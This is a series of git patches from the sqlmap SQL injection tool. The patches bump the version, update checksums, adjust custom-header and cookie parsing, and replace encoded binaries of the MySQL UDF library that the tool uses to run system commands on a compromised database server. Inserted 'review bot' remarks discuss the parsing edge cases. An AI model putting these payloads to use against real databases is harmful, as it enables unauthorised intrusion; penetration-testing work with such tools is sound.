znBJWbS>QvQmJarTY{G^{xKtFa)rq+2y}q>ux-TZ?h976ur{Hc(>r+F>P883A0vQad z?j#IAy{@kAavjVmEmOv%TIrn&JTR>@s=+zS4)j`&m2Mm@-_w$(GWAlwaou8^ir(CZ zz}mVVvpFmb;Ti$Q5OY#x`Mcl{Wz$L=NHTzj8ME$nrk3TSn+GMx2YkD8S+zYx1t@nQ zkwro&*MhHJ>DuwSyZEB}m;l_3hwjXp(JXWyrVx-Fz3zk_iaAu5eeHZg>2g6qr}=Tx z6B`jmKoG35|8W`EEtjyh>!<4v@I!y}Te2=}rsv}ns{`vuz_CH(>Dq4du6`#0cu9w6 zO5IA2EaPEgGD+`chA}r-)!+-Q`2L%HKpb>(z$+C@pZaEAX2v7K?rJ6;CH1&c=U4=V zV&eJ$4IIGF0FGe^jqU$70Q7DXcnLrgNk}Hn%DkjQ10AaQ``XtwC-{`mipo>Zic2AF z&*C#|)H%B<=7Es&+E}`Q%DZ5_7`cl1m(KYBZy>-Mx_#!KBTD?KGh+2lfN}uYOt)ZA z`LUBS{?RbTFy*;%Io86?5i;Lqq&k0ZS%6?j21z51isem(McgW@EmJ9US{=DR?NXO@ zDmArDIO9?)%4l@d4H2QARCPec(qpkDlTEd}g}eF=0wR~tR##oNdNgv34;Lu zh#GGcUb3bJiWa>M`PwSW<9z(N(ed$LUQSvSQk-d#GkHI}Enl*%i+w6~%wH+2;lXB! zYl$llDc~N?vNv=a&={GT=LuWf&Uc?APF1mI_K{4bSy~?YQBgJ+29u_)kyF@s^SONC zbp5XIzvE2;K)2lms{C2hXso8nuRH?$r47+bKxM*s+GB`3uv3K+DnIOn7l0Rq=!Cd( zPIG>$f0%k6bm4xnZ(UfEvdMqf3LZKqz-QoZ2boF5Q2+03`^b0AH D+}K`! From 93b425809e09e1780a4441f30b9e7cb6ec014a90 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar
Date: Wed, 7 Mar 2018 16:04:35 +0100
Subject: [PATCH 052/428] With latest NULL checks (Issue #2965)
---
 lib/core/settings.py | 2 +-
 txt/checksum.md5 | 4 ++--
 udf/mysql/windows/32/lib_mysqludf_sys.dll_ | Bin 4477 -> 4549 bytes
 3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index f273f963504..8c825fe9699 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.3.6"
+VERSION = "1.2.3.7"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index d5e7df371a3..ec8d900f635 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-bcc364e787f34f4c3e65eb464ab6f8d6 lib/core/settings.py
+d156fefe5e6217850cae76325485f992 lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 3cc852f927833895361973fbcfd156d2 lib/core/target.py
@@ -364,7 +364,7 @@ a44e7cf30f2189b2fbdb635b310cdc0c thirdparty/wininetpton/win_inet_pton.py
 593473084228b63a12318d812e50f1e2 thirdparty/xdot/xdot.py
 08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_
 1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_
-ada861971f716ee1307b30e7de711b29 udf/mysql/windows/32/lib_mysqludf_sys.dll_
+70d83edb90c4a20bd95eb62f71c99bd0 udf/mysql/windows/32/lib_mysqludf_sys.dll_
 7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_
 0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
 c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
diff --git a/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/udf/mysql/windows/32/lib_mysqludf_sys.dll_ index 9ad5063483a67ff509d63dd7ed18cd7f78e55596..22a11422050bc54ec4916b2ffbb2382f00840a4a 100644 GIT binary patch literal 4549 zcmV;$5jyS%ob4wBCoCwo-v*ysdwn~IdtP6HYI87ZdwY9(Rn%W^AvJf&etibuHo_ch zK71)NX3-@SB%Rt7za^(tCwr~0e^uJi6<}!5sL<94^zv`3dL@ty2nRM2L@Hb zLQT#H>lWh!$G9QTtNk1WbE=Cc;Vb^Sapfmb24lhXQOwmGKuo&`owtg9eKZC~2e-MYcC|NSafe~42buT+2Te`CU4 zX5!s%032^V6j(J%6A$BSC#0W)X!OpLa1B6j*KD%Zj+BhFW}@6vV|5n^))T`|*N=-d zG8M;z;t7J2at}WAfqR{eUYyKjQ!dkhj=@D4)6UE(8MZwHq;wd;4=te>g7#$Bqu)cq4T<_7^G!|*gt^kr>R^ghJq&g}Cx zC61w-y&N(PEinA~0vNkPRkRr5*zo}Le@GrU&lE|P690-di1@-|7Of+LQh%^7Vy& zG!rmEG8skP6de+(U8T5LS?(m%O4d%+m6~vd4MlZ#O3|Y$!+>5z`w_*E#adN}_Q%uH zgMGE@@;r>|QH=`S-W1~zZrrZTYiW=U-B+hE^D^JfkDkR@Qev%*-NA7{T1w%bQijeY z4X`idOzi$8k}&6y+Or+fC#vO9*7xPZRKfu#W6#h1OOwk%C%JQ^+x?|s*F|ShB8nw~ zgYop|*&Et#i1Nx*xN_n|o^gh;`5g@zLC2t|x&M~ecK1bEP zF0w;zB!!3%-|L0P?(P)Y3aNju65|kIBbq7SI~~!z=6&&oNh(z~E`ZFjsr#4?H;;}5 zRJ^@uIq$sDJmZBBIAF9)&j_fNkKusj+}E0FjGOG6CwKo6;*++AclB6&QOd7-AK?_r zytK+fU8Ggxz}fDx)6}^Z z*Y{1&mkT1%CV4J(*n_a`f$~N{qR&Db*mCG$BL+I~mWVWy;7m zUyUf-*8ti!*uw((Jj%&n?DOmE0!3huafQ$Y&M zj3MCMAlz&Xm;#xs>m>ik*f9>C?=RHtKH~~0EPpSC|@ND6$&t^r&;Lu2o3en zy%?JCpwK21w2t}I`Sg!mGKJOEtiP~)=FPRk0LWs_2Al(&4|rar1hq-L7*$&D>rHaH z+1|4H1uH-^%n~nD>c2D3#P_GIQ&w_8F6uNQ8!Gh``|REQ@gQ1wa17Z><(pu&??Jcd zm&+%jK@;1Pf^t69uSr3s7GUC+M65~FBTKyu;wj3o7b$B{S)ow#yFhRdbTuE75ntNI zWd-D)aaW0HaUgQ{1L)|R3`#s{T6dH;IcFBs2fxwT!cQS+IgTTe2Bp=aokBgF>jMM6 zKJcR+QsM{H%Jebv0{>JLIm`KXKC$pE6!7DWprtPM_e2LAYR8Uwa2HnkPNFeSn*v<8 zvPf(jv}SaZ92Jl9J9yR0Z3**Dwy+jRM*yg2d}QE zVhi|^6`e~fKhiqZ=be_UbziyU6nY_3uaMpbYC^mUy=L^Hf^zD^-NMB5ar;<& z1^==VNwp9Aj;8i{_v_jT_u7R3Z18Sj>?sdLqU8>m1P%F_Yji1~lmBMQne?@RuA2qt z`*IQn2(j3OVCmu~ljXv#nLK9t3=~^f#O3|NQE9oa4r=0&+kw;uAuB;WrQ9M1?KJX3 zu&^Bq@Ag1SN^=bZ-fy|l$nye3#xrVnQot|WLc0GC(PPtzFy3EB&gQ$>4e6fTn0=9$ z@Ax(eo7cPR6sko1XXHerY^mKtw}AWvA|P`L0hRsv{IaiRA^I-??b){5;ODvdnL}V1 z*Ri~xeXc9aatIY_XvD_t*vMeS7TV$A_xG}&^yD^UNG-gU1D(FTuQ2Zo${a2o 
z_b~mz2xsRu_l0UytL(X%rj6Om&tmTnyhXm<+K}8k@8%Ak+S*PjngcxVnD9g@28zq+ zw;>LqatiW!iZDoIHtDex?K@b{56_WsH*)HF!@-wJcT$O0)C-EU^=82w*c=YlL%v-^ z=}rGtFHjY{WbFn`UR+<-gUqZ!@0q2FcV4vDC)VDbO*Ym?w-%eC6o6&E7g zY1T7Czv#Os-^(e@Zk(f(3e=WxO=|wBuU;ej9bt|HK)zs~rU}V$N7S66 z=clX^Vc1I#obD$#{#ND9g&+sLArVxZy?J(70Mn}W4-^LALrbfhu>CG9l2{hiBapt! zf5Yd@PQ_wh18D`!_{+mc=DE51A;lnd@beTMr!L}!U<67BTt@~_vA zLnRNt+en+_thtq&`L=>9>)HLwSGf-W(BqKC(GpXIjXFlF?Txl+$===t$ za?7RfwsSdV3j_b|G`Y1Y9!McTP4=|arvSd8`Ljqgq+ zy4lQu&%rNvGA_jpT^NaW5*`#+O*h%H1A2!oQ`6RbZ}zm+lC;u_&uYJ-=HmxUQNi*H zH7ljn&}wxGc2(og*U1f+@@n#9vGVFnneC}k+2P!& zSx&>Y9|M&;W)u|{363l4YZ0(FxL=jn@&eMDl_RA%*-q>Z6WHy9A|3;has*<9_v5~_ z6PIV&jqH1A(-qU-7q8rs+yayIDEq5n$cIIbA)_j%Ok9|>%D4amwM@y4OTSur)xU62 z5#5>inG_hw*@oHYqYodIf?-Ee zBx>lYoPCm&PEr%Yi*Asb6g>xHHj68 zBHmnK2RVq66!MnDKosulljk3$8j+HnWrs&HYnr3W%j@eXVGdBpI4EN?F6DZPj$ohR*NAz93@Ok*KJfa zEo~xX`zz_ZN;Vp0uCl+awK#8Uq0yiVodbgw*6qmn4G#XsU!^C|N(t|rC!*BkUZo9E zEGeKQRnC>k1ee>_XuC|L5Q`emYdA4Ri}Tg$JtQ$jSz%deZXLgGoA&l^<4bb@hQg&B z;Oyq4y>uHOs~gDcYo@Jg>MNMJzAEg6dWiazjwA2Ej<<_vTMm&0^)yc3+(M@v%km0} ztSoeO|F-k&L_@DU)b6G+mFiuF&O8mRdYjjqJ7w)57A|JuY19Z3GNGR?l^+VT&qkv% zt(l#>)FxvlE0pHjo@yhdLZfqcd?N(&rb!D4h+NOkR)w?B&U~5W9vTu-8QV=4Q-MOA zIkB@3s%OCtgu%3<47sycD`CZgGNsupB3ITaD~^jwY`H+v)#T|lCLcnF#WE#lWH)-W z;%?LThaeh}?XX0D z_?GNxc|OWp{?$OIxgb4!*;`G~0Ff;JQsd`-Pk5ud063qinE$abfxB>t?8ECy?R9!_Va6)v>aNGyH|2#CV{Q8)B=51Dw*XOg zfWFR9Dcch_T{6~(mH6{rqz!{)J+P`lI)G~DMkhD26wiVEN1m#`hWD`Q>gu*GC=;c{ zZ!<-j!8YGO6%xYwF+C(tJRA~Rm`jff^foRG-}j3Ces&zS3tZ47K!6mrN@y6`Ao-P` z<2by~`KurLY2v0B;C7DdzhBf1y!FpHi>Kb4$7|WF2pl6srSePDj^RJpx36?_q%LNFPVUsJ$%n3>EB;I4tnpFrjUl z(-k-RNe$0PZ6F-0dVs0a8IAg7p-$`!at13MG8ascwj*a?YH>H}`PR*K0cZ_!4;LNJ zw}zv`PjO=bf5$MJ6bc>gg4-LIhlO7dZjgmHEimt!z(mO(gQ12(NinRrI;n7&ec(rs+BZa zWu>6l*OhQUit-~XqiQk}Og$n3dO@zsCv!nSJB#T{+DEu*`B1Qz)PYs2REp83+qj3)R9q;?W%|!6=yjJR(|}M=G(pZ^a||MFxb_ z{Go6P&6QV6sOz$C??4X$LAdu|k745dt0O$Tr&vN>%g|jbT0AP!skt*0v~H6W{R5n- z)sIXF!;lX^DTIc)mdGmp0j}m!XKQVy)-qp;bMkIGt}zLn+Tw+}d3FPP0lq;20fIj$ 
z^Qo=|q7_qpljh5{s4J_(AAr)p#jr4!qmVQxq8iB$D$Hn7C}o)ApKM$4Is$wy|6}vA zyqL}Oi~s<6&-LRB0`9*vXHN6J8tZ;%*!=4R29EiR^>8r(=REx#h-z*%=VP$Gu5;m+W0!lXw2ZFMBVt6nI@i=^3WDR)5udX jbY%;g&$Q7q*_f#p;`k$GlD{*t>|nm8|LycZJ|)lr(~0oN literal 4477 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 Pzx$g0m$(0Z=M1pG<72!& From 881b49afd2d76865e45530dc0d53f313baa1af4d Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar
Date: Thu, 8 Mar 2018 01:21:34 +0100
Subject: [PATCH 053/428] Fixes #2969
---
 lib/core/agent.py | 2 +-
 lib/core/settings.py | 2 +-
 lib/request/connect.py | 4 ++--
 txt/checksum.md5 | 6 +++---
 4 files changed, 7 insertions(+), 7 deletions(-)
diff --git a/lib/core/agent.py b/lib/core/agent.py
index ac41aadc201..e8422bcc3e1 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -121,8 +121,8 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N
 origValue = _.split('=', 1)[1] if '=' in _ else ""
 elif place == PLACE.CUSTOM_HEADER:
 paramString = origValue
- origValue = origValue.split(kb.customInjectionMark)[0]
 origValue = origValue[origValue.find(',') + 1:]
+ origValue = origValue.split(kb.customInjectionMark)[0]
 match = re.search(r"([^;]+)=(?P[^;]*);?\Z", origValue)
 if match:
 origValue = match.group("value")
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 8c825fe9699..24ceecfdf19 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.3.7"
+VERSION = "1.2.3.8"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 19049bf31a7..1a176f19ae4 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
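Review bot: After the reorder in the lib/core/agent.py hunk, `origValue = origValue[origValue.find(',') + 1:]` still runs on a value that may contain no comma, and `find` then returns -1 so the slice silently keeps the whole string, header name included, rather than flagging the malformed custom-header value. The swap only changes the outcome when `kb.customInjectionMark` appears before the first comma, which is presumably the #2969 case, and nothing in the hunk records that; a comment such as `# strip the header name first: the injection mark may sit before the comma` above the slice, plus a `# no comma -> find() is -1 and the whole value survives` note, would make both visible to the next reader. payload() starts and ends outside the hunk.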
@@ -933,9 +933,9 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent
 if value and place == PLACE.CUSTOM_HEADER:
 if value.split(',')[0].capitalize() == PLACE.COOKIE:
- cookie = value.split(',', 1)[1]
+ cookie = value.split(',', 1)[-1]
 else:
- auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
+ auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1]
 if conf.csrfToken:
 def _adjustParameter(paramString, parameter, newValue):
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index ec8d900f635..2f8304999e8 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -25,7 +25,7 @@ a4605691d340fd05d4bfe7dde922da92 lib/controller/checks.py
 9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py
 a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py
 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
-e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py
+052c368ae6ca09362a19376c8483fa85 lib/core/agent.py
 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py
 863d9c00a7684db29005705d6dcc36b9 lib/core/common.py
 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-d156fefe5e6217850cae76325485f992 lib/core/settings.py
+22b96798d429186f0f273b3e2b399289 lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 3cc852f927833895361973fbcfd156d2 lib/core/target.py
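Review bot: Switching to `value.split(',', 1)[-1]` turns a missing `name,value` separator from an IndexError into silent acceptance: with no comma in `value`, `[-1]` is the whole string, so `cookie` or the header value becomes the entire `value`, and in the `else` branch `auxHeaders[value.split(',')[0]]` is keyed by that same whole string. If a `CUSTOM_HEADER` value is guaranteed to contain the comma by the time it reaches this point, a comment such as `# [-1] tolerates a missing separator (no comma -> whole value is used)` would record the reliance; otherwise an explicit `if ',' not in value:` check with a warning would be the safer form. queryPage starts and ends outside the hunk.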
@@ -68,7 +68,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py
 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py
 eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py
 c0cabedead14b8a23353b606672cff42 lib/request/comparison.py
-6b70d287ed2508ffc66b37994d5ffca5 lib/request/connect.py
+f6a31eaa50907b724c25ead5a6fe7161 lib/request/connect.py
 dd4598675027fae99f2e2475b05986da lib/request/direct.py
 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py
 a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py
From 43044d8512f3382223bfd81eb09d1c4a10c4b139 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 8 Mar 2018 13:33:49 +0100
Subject: [PATCH 054/428] Added new compiled 64-bit version (Issue #2965)
---
 lib/core/settings.py | 2 +-
 txt/checksum.md5 | 4 ++--
 udf/mysql/windows/64/lib_mysqludf_sys.dll_ | Bin 4773 -> 5267 bytes
 3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 24ceecfdf19..09f5243002f 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.3.8"
+VERSION = "1.2.3.9"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 2f8304999e8..db964e74135 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -22b96798d429186f0f273b3e2b399289 lib/core/settings.py +bcacc60d5d1a2769a667e787eb08b625 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -365,7 +365,7 @@ a44e7cf30f2189b2fbdb635b310cdc0c thirdparty/wininetpton/win_inet_pton.py 08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_ 1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_ 70d83edb90c4a20bd95eb62f71c99bd0 udf/mysql/windows/32/lib_mysqludf_sys.dll_ -7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_ +15aaa93872ca87366065568375ad8eb1 udf/mysql/windows/64/lib_mysqludf_sys.dll_ 0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ ec41a080f4570c3866b9a7219f7623c4 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ 
diff --git a/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/udf/mysql/windows/64/lib_mysqludf_sys.dll_ index c06f77f2294b196b64954a561f14935dfa88c7ed..3641746f11aaf054c89b24c310f213b2a13b6761 100644 GIT binary patch literal 5267 zcmV;E6m07Uob5*jCoBlIzncPHTda1ndUKm~gr&$;J84jDYHCx8bzXL7%^3}REu=qu zH8UJmF=9j!s1ltPt$a~m;(Z-HC8=p7I(&kb39x>|+Jamc=6TSuG2i#z``!fK_x_mQ zmkiGV?z!jw5$?Gd$(mJwdVk`dnWF;c#VTz-(>KJ-(c0(4`_aXF*vmhe>ZvHB-eP) z&DuABq{0RKIAN$Wc*uw2H=W7qQOZ8XLDq+zcsv5wy8`KQ_#(MY?X!7dl_Yevc}TY* zdY5CaDF~cWe4(32RWm4Jc%kQunW#dAGb z0YUB^G|s=>kVX{zWY2hzj_LqvBQKa^YQEnbi)1DhB57f~ zSQ((jD`{vWc`R{r#IGPJmSrQBX(P5(C-ArjCQ|fKBW35?$}lm?SY0%F2!~9PnS9mR zWLL@;u`pN^bOb5{V-f9>i(d8dbS4F7r+9fmgo#J*DbOmczrBc|i73i7Y=@j+gxMa+ zmGR0|b*SG!!nm@B!bKPgvaQyd$cRD+ve-8;{&Hb7%`N;MO2-liI?gJv*wu+H^af_2am#)@c+nTm!^TU~<^Nrwn zpXJN1O1{nYAff=2OZc}r7aOmv8h6()yOU>4oG+O;VrJXB6O>@#I8e94Y}7zRL%Rv4 z(eVPW98p{SUoFH;q?7In)Ym#m{|A-1YRRoO$&Cb>nk2OsO$i>wF&OH20l|jCu&-*x zf@xMrA=CL0M2x-i6cHzU=Om^5g5@BbTHU)M5QwO7h>Jb3jkvXcP<7Tnh46{|r7}BJJ1NMNla# zpDe@4vmz)LKt%25VapHmOp)w7nyY*;mOzT?Snx7mq}gys*Y?$?hj1QkW*Iq$EK!&* zlsBueDi3Qi=V+_3fg~kox#PXPioQ%`%;Q8-VvKlkl%cB*RC?@J0I>0lw#y2k8IWi*)Iq^t^u~v>)|2jX)*u}>_lFjN zeqKaw1(%JJ?QC1w-U*Tlr-$kRMB~Y#L6sb7bR^&8uL~pty~8^VFL2v&jUrDW^FEyX zc69gN@>uMdn8@vMPU<7iClCk{TN5d?KtR2R@O)6}yWaa9Va|)&E8GiV%v=y&x#?h! 
